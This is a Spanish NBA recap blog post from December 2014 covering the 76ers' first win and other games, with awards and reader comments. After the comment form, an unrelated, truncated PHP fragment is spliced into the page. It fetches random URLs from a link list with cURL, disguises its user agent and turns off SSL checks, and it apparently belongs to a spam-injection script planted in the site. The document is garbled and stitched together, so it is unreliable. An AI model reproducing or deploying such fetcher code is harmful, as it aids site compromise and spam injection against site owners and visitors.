La Crónica: Por fin, Philadelphia

04 de December de 2014 por FranGuaita

Con su triunfo en Minneapolis, los 76ers evitan igualar el peor inicio en la historia de la NBA. Pau Gasol firma un brutal doble doble y los Bulls se imponen en el Time Warner Cable Arena. Además, canastón at the buzzer de Monta Ellis para sellar la victoria de Dallas en Milwaukee. Prórrogas en Brooklyn y Boston… Un miércoles de locura. Pasen y lean.

HORNETS 95 – BULLS 102

Pese a sufrir en sus barbas una de las jugadas más humillantes de la regular season 14/15, Nikola Mirotic supo rehacerse para ser protagonista en el triunfo de Chicago a orillas del Catawba. En la recta final del tercer cuarto, el ex jugador del Real Madrid acabó con sus posaderas en el suelo víctima del diabólico juego de pies de Kemba Walker. Desde el parket vio cómo, para mayor escarnio, el triple del base de los Hornets desde más allá de 27 pies entraba limpio. Minutos después, ya en el último cuarto y con Charlotte creciendo en busca de la remontada, el 4×4 montenegrino metía un triple lateral y le sacaba un 2+1 de manual a PJ Hairston. Dos jugadas decisivas para preservar el liderato de Chicago hasta el bocinazo final. Doble doble de Mirotic (11 puntos, 12 rebotes) y otra noche en la oficina para Pau Gasol (19 puntos, 15 rebotes). Siguen apareciendo brotes verdes en el planeta Derrick Rose… Si no aparecen intermitencias en su estado físico y sigue jugando con normalidad en mayo será una amenaza para cualquiera que se cruce en su camino.

WIZARDS 111 – LAKERS 95

Tras meter un milagroso triple a tabla en la última posesión del partido -recibiendo además una falta personal de Kobe Bryant-, John Wall inició un divertido bailoteo desde el suelo. No era para menos. Había sufrido de lo lindo. El +16 final no refleja en absoluto la diferencia real entre ambas franquicias durante los 48 minutos de intercambio de golpes. Washington fue superior, pero no tanto como para apalizar a unos Lakers fundidos tras la victoria conseguida la madrugada del martes al miércoles en Detroit. La lesión de Paul Pierce en el pie derecho aumentó la dependencia de los Wizards en su Big Three. Y todos ellos respondieron. Con creces, además. Bradley Beal fue el brazo ejecutor con 27 puntos y una serie de 11-19 en tiros de campo. John Wall generó juego en estático y dibujó transiciones eléctricas viviendo a toda pastilla (17 puntos, 15 asistencias) y, fundamental en la pintura, Marcin Gortat se merendó a la pareja interior Boozer-Hill firmando una planilla con 21 puntos y 11 rebotes. Dueño y señor del frontcourt. Kobe tuvo un inicio estelar, de los que hacen presagiar noches inolvidables (15 puntos en el primer cuarto, con 6-11 en tiros de campo para poner a los Lakers 6 arriba: 27-33)… pero a los 36 tacos un back to back se hace duro hasta para las leyendas. Mañana en Boston tendrá su revancha.

BUCKS 105 – MAVERICKS 107

No es habitual ver a Dirk Nowitzki con traje de calle. Mucho menos verle dando saltos eufóricos celebrando los tiros ganadores de otro. Pero todo eso ocurrió anoche en Wisconsin. Son los efectos secundarios de compartir vestuario con un jugón capaz de firmar canastas impensables. Horas después de enchufarle 38 puntos a Chicago en el United Center, Monta Ellis silenció al BMO Harris Bradley Center con una jugada marca de la casa. At the buzzer. Fade away desde el cuello de la botella mientras se iluminaba el tablero y todo el cuerpo técnico de Milwaukee se levantaba en bloque para pedir pasos en el reverso de Ellis. En baloncesto FIBA lo hubieran pitado seguro. Pero en la NBA… It’s a win. Ausente Robin Hood, seis jugadores de los Mavericks alcanzaron las dobles figuras: el propio Monta, Parsons, Aminu, Chandler, Nelson y Jefferson. Ni en sus mejores sueños Cuban hubiera guionizado un back to back como este.

TIMBERWOLVES 77 – 76ERS 85

Heridos en su orgullo ante la posibilidad de convertirse en el equipo que podía igualar el peor inicio histórico de una temporada en la NBA, los 76ers se impusieron en el Target Center. Demasiadas concesiones para Philadelphia: ni Ricky, ni Pekovic ni Kevin Martin y con un Andrew Wiggins muy por debajo de su nivel. Michael Carter-Williams entendió el mensaje y flirteó con el triple doble: 20 puntos, 9 rebotes y 9 asistencias. Los 76ers de la temporada 72-73 siguen conservando el dudoso récord del peor arranque NBA con un desolador 0-18.

ROCKETS 105 – GRIZZLIES 96

No Dwight, no problem. Houston realizó ante Memphis uno de los mejores partidos de la temporada pese a la ausencia de Howard. 21 puntos de James Harden y 16 para Trevor Ariza y Jason Terry en unos Rockets que a la conclusión del tercer cuarto tenían el partido sentenciado (94-68). Noche para olvidar de Marc Gasol (8 puntos, 7 rebotes). Con la derrota de Memphis, Golden State es líder en solitario de la Western.

NETS 95 – SPURS 93 (OT)

Manu Ginóbili dispuso del tiro definitivo para poner patas arriba el Barclays Center, pero su triple impactó en la parte izquierda del aro y el tiempo se agotó mientras Joe Johnson y Danny Green pugnaban por el rebote. De este modo, los Spurs vieron interrumpida su racha de ocho victorias consecutivas ante Brooklyn. Mirza Teletovic disputó anoche uno de sus mejores partidos desde que aterrizó en la NBA (26 puntos, 15 rebotes, con 5-7 en triples). Conviene no perder de vista los números de su pareja de baile en la pintura: Brook López se marchó hasta los 16 puntos, 15 rebotes y 2 tapones. Quinta derrota de la temporada para San Antonio, que está a tres partidos de Warriors, líderes del salvaje Oeste.

CELTICS 109 – PISTONS 102 (OT)

Boston se prepara para recibir a Lakers en la batalla entre históricos de mañana con una trepidante victoria ante Detroit en el tiempo extra. Jeff Green, con 32 puntos, 6 triples y una impecable serie de 10-10 en el tiro libre fue el MVP de la madrugada en el TD Garden. Las segundas unidades pidieron paso a golpe de canasta. 29 puntos y 7 rebotes de Greg Monroe desde el banquillo. También procedente de las profundidades de la rotación céltica, Kelly Olynyk se apuntó a la fiesta con 20 puntos. Celtics (5-11) vs Lakers (5-14), mañana en el Garden. Cómo hemos cambiado…

HEAT 102 – HAWKS 112

Atlanta gana credibilidad con un trabajado triunfo en el American Airlines Arena. Jeff Teague, con 27 puntos y una espectacular serie de 8-11 en tiros de campo, fue el jugador más destacado para los Hawks, que envían un mensaje a Miami pensando en un hipotético enfrentamiento en Playoffs. Ha habido cambio de guardia en el Este. Se lesionó Deng en el segundo cuarto pero algo falla en Florida cuando aun así Wade y Bosh no son suficientes. Ni combinándose para 55 puntos fueron capaces de escribir una W en la hoja de ruta de los Heat. Así es la NBA, donde nada es para siempre.

RAPTORS 123 – JAZZ 104

 No hubo prácticamente partido en Utah. Los Raptors alcanzaron los 18 puntos de ventaja en el segundo cuarto y ya no sufrieron en todo lo que quedaba de encuentro. Las facilidades defensivas de los locales fueron aprovechadas por un Kyle Lowry en estado de gracia y bien acompañado por Lou Williams y Greivis Vasquez.

PREMIOS

MVP: Kyle Lowry tomó toda la responsabilidad ante la baja de DeMar DeRozan y pasó por encima de los Jazz con 39 puntos, 4 asistencias y 5 rebotes.

Rookie: Otra buena actuación de KJ McDaniels. El de los Sixers acabó con 12 puntos, 9 rebotes y 4 tapones. Joe Ingles anotó 12 puntos.

Sorpresa: Mirza Teletovic salió de titular y aportó a los Nets la energía y el talento necesarios para imponerse a los campeones. El bosnio brilló con 26 puntos y 15 rebotes.

Decepción: Nefasto partido de Jeremy Lin ante los Wizards. El ex de Harvard no fue capaz de anotar ninguno de sus 10 lanzamientos a canasta y además perdió 4 balones. El juego interior de los Grizzlies naufragó inexplicablemente ante unos Rockets sin Dwight Howard. Entre Gasol y Randolph solo anotaron 16 puntos.

Esfuerzo en vano: Andre Drummond sacó a relucir todo su repertorio (27 puntos, 14 rebotes, 4 robos, 5 tapones) pero no pudo evitar que los suyos cayeran ante los Celtics.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Futurman dice:
    #1

    El rookie podría ser para Mirotic también.

      Citar

  2. Futurman dice:
    #2

    O incluso para Bogdanovic, que en los Nets jugó bien.

      Citar

  3. Ruxixón dice:
    #3

    Madre mía,vaya sorpresón lo de….¡Brook Lopez!15 rebotes,vaya milagro,igual es career high y todo.Ahora en serio,por fin tuve la oportunidad de ver a los 76ers en acción y llegó su primer victoria,cosa de la que me alegro.Un poco lo esperado de sus jugadores franquicia.MCW sigue cometiendo muchas pérdidas y lanzando mal para lo que es un PG los tiros libres,y Noel sigue enganchado,nunca mejor dicho,a ese ganchito tan efectivo que tiene,pero aparte de eso su juego ofensivo parece estancado respecto a su nivel NCAA.Me esperaba mayor fiabilidad de KJ McDaniels,que tenía buenos números,pero ayer estuvo fatal de 3.Pero además en plan unos triples que en cuanto salían de las manos se veía que eran unos auténticos castañazos.Compensó cargando muchísimo el rebote eso sí y aportando en otras facetas.Henry Sims me gustó en ataque,aunque sólo lo buscaron en el primer cuarto,en defensa me pareció muuuuuuy verde,con un desplazamiento lentísimo.Y luego Mbah a Moute lo más serio del roster,no deja de ser el más veterano,J-Rich mediante.Del resto poco que decir,ese Covington que les dio la vida en los instantes finales a Phily.

    A nivel colectivo hay una cosa que no me explico de Brett Brown.Si quiere que su equipo abuse tanto del triple(el peor de la liga,siendo el 9º que más intentos realiza),porqué no fichar un Troy Daniels o un perfil así de jugador,una metralleta desde fuera.Un jugador mismo de la liga de desarrollo,que seguro hay alguno.Total esta temporada no se juegan nada y encontrar un jugador de ese perfil puede serles de utilidad a medio plazo.

    @Nacho: Lo del tobillo de Noah que comentabas por la noche creo que viene ya del partido contra Mavericks,que se torció el tobillo muy al final del partido.Parecía una cosa seria pero en la siguiente jugada defensiva Thibodeau ya lo volvió a meter y bueno,parecía que estaba OK.Pero claro,es Noah.Ese juega en coma si hace falta.

      Citar

  4. rumbero dice:
    #4

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>